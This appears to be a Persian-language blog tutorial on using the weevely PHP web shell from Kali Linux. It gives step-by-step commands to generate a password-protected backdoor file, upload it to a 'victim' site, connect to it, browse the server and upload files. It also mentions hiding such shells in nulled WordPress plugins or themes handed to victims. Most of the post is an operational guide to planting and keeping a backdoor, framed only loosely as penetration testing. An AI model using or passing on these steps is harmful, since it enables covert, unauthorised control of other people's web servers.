امنیتوب

آموزش ابزار weevely ونفوذ به سایت در کالی لینوکس

weevely tool

این ابزار برای تست نفوذ به وبسایت ها استفاده می شود هکر ها با استفاده از این فایل دسترسی خود را بر روی سرور هک شده حفظ می کنند

backdoor (درب پشتی)

ابکدور (backdor) به معنای درب پشتی است ولی در مبحث هک و امنیت هکر ها برای نگهداری دسترسی بعد از نفوذ از ان استفاده می کنند

شل اسکریپت (shell)

شل به طور کلی به معنای دسترسی می باشد که انواع مختلفی در موضوعات مختلف دارد
شل اسکریپت ها برای حفظ دسترسی و حتی دسترسی های بیشتر در وب سایت های هک شده به کار میروند.
این شل به زبان php نوشته شده و باید در سرور های آپاچی اجرا شود

فهرست مطالب

معرفی ابزار weevely

این ابزار یک وب شل قدرتمند است که پس از اجرا بر روی سرور اپاچی به هکر دسترسی شل داده و امکان استفاده از 30 ماژول قدرتمند را می دهد.
پاک کردن شل از سایت

آموزش استفاده از Weevely در کالی لینوکس

1. نصب و راه اندازی

اگر از سیستم عامل کالی لینوکس استفاده میکنید این ابزار به صورت پیش فرض در این سیستم عامل نصب است و نیازی به نصب دوباره آن نیست

sudo git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 weevely.py

آموزش نصب weevely

درصورتی که از این روش برای نصب استفاده کردید به جای weevely در دستورات زیر python  weevely.py وارد کنید 

2.ایجاد فایل شل

با دستور زیر می توانید فایل شل جدید بسازید برای مثال ما فایلی با نام googledb.php می سازیم و رمز آن را 123 می گذاریم و محل خروجی را دسکتاپ قرار دادیم ( نام کاربری ما zeroday است)

  محل ذخیره سازی رمز weevely generate :دستور
weevely generate 123 /home/zeroday/Desktop/googledb.php:مثال

عکس از فایل شل
کد های php بین دو تگ php?> و تگ <? اجرا می شوند

سپس فایل شل را بر روی سایت مورد نظر آپلود کنید
هکر ها ممکن است برای مثال آن را در یک افزونه یا قالب وردپرسی جاسازی کنند و به صورت نال شده در اختیار قربانیان قرار دهند.

3.اتصال به فایل شل و گرفتن دسترسی

بسیار خوب پس از آپلود فایل شل در هاست قربانی وقت اتصال به آن می رسد ، برای اتصال می بایست دستور زیر را وارد کنید شما به آدرس فایل آپلود شده و رمزی که در مرحله ایجاد گذاشته اید نیاز دارید

رمز آدرس weevely :دستور
weevely http://site.com/googledb.php 123 :مثال

4.فهرست دستورات

در این مرحله پس از دسترسی می توانید دستورات لینوکسی را وارد کنید برای مثال دستور git clone یا دستور python یا cd  و ls کار میکرد ولی ابزار weevely  حدود 30 دستور دارد که با زدن دستور زیر می توانید آنها را مشاهده کنید.

help

5.چند مثال کاربردی از دستورات

در این مرحله تصمیم دارم شما را با چند دستور کاربردی آشنا کنم

دیدن لیست فایل های پوشه:

گاهی اوقات با زدن دستور ls قادر به دیدن فایل های پنهان نیستیم که با زدن دستور زیر این مشکل حل می شود

file_ls

دیدن محتوای پوشه در لینوکس

 

جا به جا شدن در پوشه ها:

در برخی موارد برای جا به جا شدن و رفتن به بعضی از پوشه ها وقتی از دستور cd استفاده می کنیم با ارور دسترسی مواجه می شویم که با استفاده از دستورات زیر رفع می شود.
به جای [Folder] نام پوشه را قرار دهید

file_cd [Folder]

 

آپلود فایل روی سرور قربانی:

این دستور به ما کمک میکند که فایل هایمان را بر روی سرور قربانی آپلود کنیم
به جای [1] آدرس فایل در سیستم خودتان (می توانید فایل را در این مرحله در ترمینال بکشید و رها کنید تا آدرس در ترمینال درج شود)
به جای [2] آدرس محل آپلود فایل در سرور را وارد کنید

:file_upload2web [1] [2]

آپلود فایل بر روی سرور هک شده
مثلا اپلود فایل mysql.zip در پوشه ggdb

علی میلانی

علی میلانی هستم این سایت رو راه انداختم تا مطالبی که یاد میگیرم به اشتراک بزارم تا همه استفاده کنن :)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا